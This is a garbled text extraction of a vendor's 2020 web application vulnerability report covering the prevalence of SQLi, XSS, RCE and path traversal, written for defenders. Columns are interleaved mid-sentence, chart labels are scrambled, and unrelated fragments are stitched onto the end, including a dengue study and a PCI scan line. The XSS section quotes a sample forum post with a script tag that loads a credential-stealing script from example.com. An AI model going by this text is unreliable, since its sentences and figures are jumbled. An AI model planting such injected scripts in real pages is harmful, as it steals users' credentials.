Web ApplicationVulnerability Report2020
Executive SummaryContentsIntroduction2Methodology4The Data5Vulnerabilities at a Glance6Vulnerabilities by Type6High Severity6Medium Severity7Vulnerability Severity8Vulnerability Analysis9The 2020 edition of theAcunetix Web ApplicationVulnerability Report containsa statistical data analysis forweb vulnerabilities and networkperimeter vulnerabilities.We prepared the report by doing the following: Taking data from Acunetix Online for scans performedbetween March 2019 and February 2020 Randomly and anonymously selecting 5,000 scan targetsRemote Code Execution9 Focusing on High Severity and Medium SeveritySQL Injection (SQLi)10vulnerabilitiesBlind SQL Injection11Local File Inclusion and Directory Traversal12Cross-site Scripting13Vulnerable JavaScript Libraries14Weak Passwords and Missing Brute-Force Protection15Reserved Information Disclosure15Source Code Disclosure16Server-side Request Forgery17Overflow Vulnerabilities18Perimeter Network Vulnerabilities19 SQL Injection (SQLi): 8% ( from 14% in 2019)DoS-related Vulnerabilities20 Directory traversal: 4% ( from 2% in 2019)Cross-site Request Forgery21 Cross-site Scripting (XSS): 25% ( from 33% in 2019)Host Header Injection22Directory Listing23TLS/SSL Vulnerabilities23 Host header injection: 2.5% ( from 4% in 2019)WordPress (and Other CMS) Vulnerabilities24 WordPress vulnerabilities: 24% ( from 30% in 2019)Web Server Vulnerabilities and Misconfigurations25Conclusion26About Acunetix27Acunetix Web Application Vulnerability Report 2020Our general observations are: The total number of web and network perimetervulnerabilities is slightly less than last year Relatively new scan targets had more vulnerabilitiesthan othersWe found the following selected vulnerabilities in thefollowing percentage of targets: Remote code execution (RCE): 3% ( from 2% in 2019) Vulnerable JavaScript libraries: 24% ( from 33% in 2019) Server-side Request Forgery (SSRF): 1% (1% in 2019) Cross-site Request Forgery (CSRF): 36% ( from 51% in 2019)the full report below contains more vulnerabilitytypes. we also explain every vulnerability and, ifpossible, advise you on how you can fix such issues.1
IntroductionWelcome to the 2020 edition ofthe Acunetix Web ApplicationVulnerability Report.Every year, Acunetix analyzes data received from AcunetixOnline and creates a vulnerability testing report. ThisVulnerabilitiesHIGH SEVERITYMEDIUM SEVERITY100%84%79%80%72%63%60%55%report represents the state of security of web applications42%40%and network perimeters. This year’s report contains the35%results and analysis of vulnerabilities detected over the26%12-month period between March 2019 and February 2020,20%based on data from 5,000 scan targets. This analysismainly applies to high and medium severity vulnerabilities0%2016found in web applications, as well as perimeter network201720182019vulnerability data.The demand for interactive web applications is growing.While people might think that web applications in generalBecause of this, web applications use more and moreare slowly getting more secure, the truth is less optimistic.client-side technologies. As a result, the number ofWe have observed that applications that are protected byJavaScript libraries keeps increasing. Many of theseweb vulnerability scanning are the ones that are becominglibraries have vulnerabilities. Their authors and users knowmore secure. We have also noticed that relatively newabout these vulnerabilities. And yet, around 25% of webtargets have more vulnerabilities.applications use such vulnerable libraries.This is worrying from a security perspective. It meansIt is also interesting when we compare server-sidethat new developers do not have the knowledge that isprogramming languages. We see that PHP remains asrequired to avoid vulnerabilities. It also suggests thatpopular as before. The second most popular language isthese developers are working within a developmentASP.NET, but developers more and more often use other,structure that does not promote web security. Old habits,less popular server-side languages.unfortunately, die hard.We discovered Cross-site Scripting (XSS) vulnerabilities,Usage of server-sideprogramming languagesvulnerable JavaScript libraries, and WordPress-relatedissues in 25% of the sampled targets – certainlya lot. This means that web applications are still quitevulnerable, but even so, this number is 30% less thanErlangColdFusionPerlJavaScriptPythonStatic filesScala100%Ruby80%Javafor the last year. It seems that experienced websitedevelopers and system administrators are makingprogress. The situation is similar for SQL Injectionissues – just like last year, the numbers are 162017201820192020DATA OBTAINED FROM:https://w3techs.com/technologies/history overview/programming language/ms/y (MAR 2020)Acunetix Web Application Vulnerability Report 20202
When we talk aboutvulnerabilities, thesituation is different.One conclusion comes to mind when we consider thistogether with general statistics from the previous graph. Itseems that the PHP Apache/nginx platform is becomingmore secure, mature, and robust. The market alsokeeps favoring this platform. On the other hand, theASP/ASP.NET IIS platform is slowly losing popularity. AtSee the graph below:the same time, it is still not as robust and mature as wewould hope. The percentage of PHP vulnerabilities has declineda lot. The percentage of ASP or ASP.NET vulnerabilitiesPHP is so popular because a lot of PHP sites are WordPressis growing.sites. WordPress sites are often unsafe but rather static.After you select the theme and plugins, you don’t change The percentage of vulnerabilities in Apache/nginxmuch. The attack surface changes only when you updatehas declined a lot. The percentage of IIS vulnerabilitiesWordPress, themes, and plugins. And most of theseis growing.updates are security updates.This also suggests that ASP/ASP.NET web applicationsWhy might this be?are more actively developed. The high percentage ofvulnerabilities may be caused by active development. We assume that most ASP/ASP.NET web applicationsrun on IIS web servers. We assume that most PHP web applications run onApache or nginx web servers.Percentage of vulnerabilities detected in various platforms We observe that the trend for PHP is similar to the trendfor Apache/nginx. We also observe that the trend for ASP/ASP.NET isIISASP/ASP.NETApache/nginxPHP25%similar to the trend for IIS.20%15%10%5%2018Acunetix Web Application Vulnerability Report 202020193
MethodologyWe took a random sample of 5,000 scan targets fromAcunetix Online from one year back. This sample includedReportingweb application and network perimeter security scans.You can view the progress of a scan in real-time, but theWe excluded scans for websites that are intentionallyresults of a scan are typically summarized in reports.vulnerable for educational purposes.You can use reports for compliance and managementpurposes. Acunetix offers several report templates forHow Automatic WebScanning WorksAcunetix Online can perform dynamic application securitytesting (DAST) scans (also called black-box scans), as wellas interactive application security testing (IAST) scans (alsocalled gray-box scans).A DAST scan means that the scanner has no informationabout the structure of the website or used technologies. AnIAST scan means that the scanner has “insider information”about the web application. In Acunetix, this is possiblethanks to AcuSensor technology. You install AcuSensoragents on the web server for Java, ASP.NET, and PHPapplications. The agents send information from the webserver back to the scanner.When scanning, you typically follow the following fourstages and repeat them if necessary:Crawlingdifferent purposes, for example, OWASP Top 10 andISO 27001 reports.RemediationFixing vulnerabilities:PatchingFirst, export Acunetix data to a web application firewall(WAF). This lets you temporarily defend against anattack while you work on a fix.Issue ManagementWhen you integrate with issue trackers like JIRA,GitHub, and GitLab, you can track vulnerabilities fromthe moment they are discovered to resolution. You canalso integrate with continuous integration solutionssuch as Jenkins.Continuous ScanningAcunetix can perform scheduled scans. You can usethem to make sure that vulnerabilities are really fixed.The Acunetix crawler starts from the home or indexpage. Then it builds a model of the structure of the webapplication by crawling through all links and inputs.It simulates user browser behavior to expose all thereachable elements of the website.ScanningOnce the crawler has built the website model, eachavailable page or endpoint is automatically tested toidentify all potential vulnerabilities.Acunetix Web Application Vulnerability Report 20204
The DataWe gathered the data analyzed in this reportfrom scans run in Acunetix Online. We focusedon high and medium severity vulnerabilityalerts in web and network scans.Web scansNetwork scansAverage locations scanned per 000500,00002018020192018020192019Average vulnerability alerts triggered per monthAverage vulnerability alerts triggered per 050,00050,000,000020182019Acunetix Web Application Vulnerability Report 20200201820195
Vulnerabilities at a GlanceThis section lists all the detected vulnerabilities.Vulnerabilities by TypeThe charts list vulnerabilities by type. They are grouped by the vulnerability severity level.HIGH SEVERITYThis chart illustrates vulnerability types that fall into our High Severity 6.76%4.83%5%3.03%2.82%1.43%0.43%0.73%1.39% 1.48%saralbleJS XSSWlieSoak braurpa riesW cesscoorwdedPordsress disclovuslner ureOabivelitrflieowsvuSSlner RFabNiliettieworskN(SetSHwo)Net rk orytraRCE0%Acunetix Web Application Vulnerability Report 20206
Vulnerabilities at a GlanceMEDIUM SEVERITYThis chart lists vulnerability types that fall into our Medium Severity 78%5%2.48%er TLSab /Sili SLtiesvulnDireclis tortin ygHostin heaje dct eio rnSRFCDoS0%We utilize Acunetix to more thoroughly assess internet-facing websites andservers. Acunetix helps us identify vulnerabilities in conjunction with othervulnerability scanning applications. Acunetix has been a more reliableapplication when discovering/determining different types of malicious codeinjection vulnerabilities (SQL, HTML, CGI, etc).Carter Horton, Assoc. Information Analyst, GD Information TechnologyAcunetix Web Application Vulnerability Report 20207
Vulnerability SeverityWhat is a Vulnerability?A vulnerability is a flaw in an application or device thatthe impact that the exploit may have on the system.can be exploited by malicious hackers. Attackers canSeverity also depends on how difficult it is to exploit theexploit a vulnerability to achieve a goal such as stealingvulnerability.sensitive information, compromise the system by makingit unavailable (in a denial-of-service scenario), orYour business may have many systems runningcorrupt the data.simultaneously – and some are more critical than others.Acunetix allows you to grade these systems using businessThe impact of vulnerabilities varies depending on thecriticality. Essential systems have a higher criticality thanexploit. Acunetix assigns severity mostly depending onnon-essential ones.High SeverityMedium SeverityLow SeverityThis level indicates that an attacker canThis level indicates that an attacker canThis level indicates that an attackerfully compromise the confidentiality,partially compromise the confidentiality,can compromise the confidentiality,integrity, or availability of a systemintegrity, or availability of a targetintegrity, or availability of a targetwithout specialized access, usersystem. They may need specializedsystem in a limited way. They needinteraction, or circumstances that areaccess, user interaction, or circumstancesspecialized access, user interaction,beyond the attacker’s control. It is verythat are beyond the attacker’s control.or circumstances that are beyondlikely that the attacker may be able toSuch vulnerabilities may be usedthe attacker’s control. To escalate anescalate the attack to the operatingtogether with other vulnerabilities toattack, such vulnerabilities must be usedsystem and other systems.escalate an attack.together with other vulnerabilities.COMBINED VULNERABILITIESIn most cases of Medium Severity and Low Severity vulnerabilities, the attack is possible or more dangerous when theattacker combines it with other vulnerabilities. Such vulnerabilities often involve social engineering.Acunetix Web Application Vulnerability Report 20208
Vulnerability AnalysisRemote Code ExecutionRemote Code Execution(RCE) is at the top of the HighSeverity list. An attacker canuse this vulnerability to runarbitrary code in the webapplication.ANALYSISThe percentage of web applications vulnerable to RCE islow but it was much lower last year (2%). This is worryingbecause this vulnerability can cause serious damage. Suchvulnerabilities must be fixed as first priority.If the attacker can run code, they can take it to the nextlevel by running commands in the operating system. Theymay be able to completely take over the system andpossibly create a reverse shell – an outbound connectionfrom the host to the attacker.In many cases, this bypasses firewall configurations. Mostfirewall configurations block inbound connections, notRCE – 3%outbound connections. If outbound connections are notverified, the attacker can use a compromised machine toreach other hosts, possibly getting more information orcredentials from them.Acunetix Web Application Vulnerability Report 20209
SQL Injection (SQLi)An SQL Injection (SQLi) attackis possible if the developerdoes not examine or validateuser input.As a result, attackers can input an SQL query that isthen executed by the backend database. Such a querymay reveal, add, or delete records or even entire tables.This can impact the integrity of the data and possiblycompletely stop the web application (denial-of-service).SQL Injection has been around for a long time, and is oneof the most common and most damaging vulnerabilities. Itis also well known. Many tools and techniques are availableto defend against such attacks, but malicious hackers alsohave many tools to exploit these vulnerabilities.SQL Injections often let an attacker obtain access tocustomer records, personally identifiable information (PII),and other confidential data. With GDPR legislation, this isbecoming increasingly important. Lack of compliance maylead to big fines.Such vulnerabilities may allow the attacker to create orchange files in the host system or even run commands.They may also allow the attacker to move to other hosts.SQLi – 7.94%Acunetix Web Application Vulnerability Report 202010
Blind SQL InjectionBlind SQL Injection isa more complex version ofSQLi. Attackers use it whentraditional SQLi is not possible.Blind SQL Injections take a lot of time and a large numberof requests. A system administrator may notice the attackby checking for a large number of requests using simplelog monitoring tools.This attack is called “blind” because the attacker cannotcause the web application to directly expose data. Thetrick is to use conditional elements of an SQL query, forANALYSISWe found that 8% of analyzed targets had at leastone SQLi vulnerability. This was very unexpected. SQLInjections first appeared in 1998. All major developmentenvironments and frameworks include tools to eliminatethem. SQL Injections should not be so common.The correct way to defend against SQL Injection attacksis to use parameterized SQL queries. Practically allframeworks and languages today make it possible.The large number of SQL Injection vulnerabilities may,therefore, be caused by older applications that werewritten when these tools were not available.example, one that returns true and the other that returnsfalse. If the application behaves differently in these twocases, it may let the attacker retrieve information onepiece at a time. Another trick is to use SQL statements thatcause time delays – depending on the delay, the attackerknows how the statement was executed.Blind SQLi – 3.8%Acunetix Web Application Vulnerability Report 2020Union/error SQLi – 4.14%11
Local File Inclusion and Directory TraversalLocal file inclusion (LFI) anddirectory traversal (pathtraversal) vulnerabilities letthe attacker access the hostsystem. The attacker maydo it by using “.\” or “./” toreference a parent directory.ANALYSISWe found 4% of sampled targets vulnerable to directorytraversal. A further 1% were vulnerable to local fileinclusion. Last year, the figure for directory traversal wasonly 2%. This is worrying because this is a very old andwell-known vulnerability.In the case of directory traversal, the attacker may readfiles that should not be accessible. In the case of Linuxand UNIX, the attacker may use the /proc directory toaccess software components, hardware devices, attachedfilesystems, network, and more. They may also use theLFI – 1%Directorytraversal – 4%/etc directory to access confidential information such asusernames, group names, and passwords.In the case of local file inclusion, the attacker might beable to not only read files but also to include code fromthem. If the attacker can upload source code files, theycan then execute this code on the web server.Acunetix Web Application Vulnerability Report 202012
Cross-site Scripting (XSS)Cross-site Scripting (XSS)occurs when the attackerinjects malicious scripts intoa web page, usually JavaScript.Reflected (or non-persistent) XSS is a variantInteractive web applications need to execute scripts in yourDOM-based XSS is an advanced type of XSS. In thislocal browser and this makes Cross-site Scripting possible.case, the attacker creates a script that is executed by thewhere the injected script is not stored by the webapplication. The attacker delivers a web address tothe victim using social engineering (e.g. phishing).The victim clicks the link, goes to the vulnerablepage, and the victim’s browser executes the script.browser’s DOM (Document Object Model) engine. TheThis type of vulnerability is mostly caused by developersinjected script is often not sent to the server at all. This typefailing to validate or sanitize user input. If the user includesof XSS is common in JavaScript-rich sites such as single-JavaScript code in a form and the developer uses thatpage applications (SPAs).form input directly on the web page, it guarantees anXSS vulnerability.For example, a malicious user may enter the followingYou can use CSP (Content Security Policy) to combat theseattacks, but this feature is still not popular enough amongweb developers.message into a forum:Thanks for your help! script src "http://example.com/getcreds.js" This message is then included in the forum thread. Ifanother user opens this page, their browser will executethe JavaScript code. This code downloads maliciousJavaScript from the attacker’s website (in this case fromexample.com).There are 3 main types ofXSS vulnerabilities:ANALYSISAn alarming 25% of sampled targets were vulnerable tosome type of XSS. Thankfully, this is less than last year, butdevelopers still have a lot of work to do to defend users.New JavaScript templates and frameworks keepappearing on the market and gain popularity.Unfortunately, versions of these templates andframeworks with known vulnerabilities are also in use.XSS
ASP/ASP.NET IIS platform is slowly losing popularity. At the same time, it is still not as robust and mature as we would hope. PHP is so popular because a lot of PHP sites are WordPress sites. WordPress sites are often unsafe but rather static. After you select the theme and plugins, you don’t change much. The attack surface changes only when you update WordPress, themes, and plugins. And .
Kandy. The highest vulnerability (0.45: moderate vulnerability) to dengue was indicated from CMC and the lowest indicated from Galaha MOH (0.15; very low vulnerability) in Kandy. Interestingly the KMC MOH area had a notable vulnerability of 0.41 (moderate vulnerability), which was the highes
or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities. An attacker taking advantage of an SQLi vulnerability is essentially exploiting a weakness introduced into the application through poor web application development practices.
Low 3.50 Pass Note to scan customer: This vulnerability is purely a denial-of-service vulnerability and it is not considered a failing condition under the PCI DSS. 10 23.229.184.1 (www. dumbbellshealth club.com) SSL Weak Encryption Algorithms Low 1.80 Pass Note to scan customer: This vulnerability is not recognized in the National Vulnerability .
Vulnerability Management solution available on demand Software-free, management free solution - Auto-updating - No software to install or maintain Industry's most comprehensive Vulnerability KnowledgeBase 3700 vulnerability signatures, updated daily Most accurate vulnerability scanner with less than .003% false positive rate
Common Vulnerability Scoring System (CVSS) values o Numerical score reflecting the severity of the vulnerability Results The associated CVSS score attached to each vulnerability by the NVD provides organizations with a visible metric to gauge the severity associated with any vulnerability and help prioritize any threat remediation strategies.
facilitating system vulnerability assessment incorporates a single, graphical representation of a system. This system representation is provided to multiple risk/vulnerability assessment tools and vulnerability data or knowledge bases, resulting in a single, consolidated input to multiple tools. A Fuzzy E xpert System applies the unique correlation
Deploying APEX Vulnerability Scanner Summer Student Report 2016 26th of August, 2016 Evaluation example - SQL-injection Application was 77, 01% approved. Application was purposely made to be vulnerable for SQL-injection The tool found the vulnerability and identified it as a SQL injection vulnerability ( SQL:Reports - 1) Conclusions
for SQL Injection, Cross Site Scripting (XSS) & other web vulnerabilities. Acunetix History Acunetix has pioneered the web application security scanning technology: Its engineers have focused on web security as early as 1997 and developed an engineering lead in web site analysis and vulnerability detection. How Acunetix Works?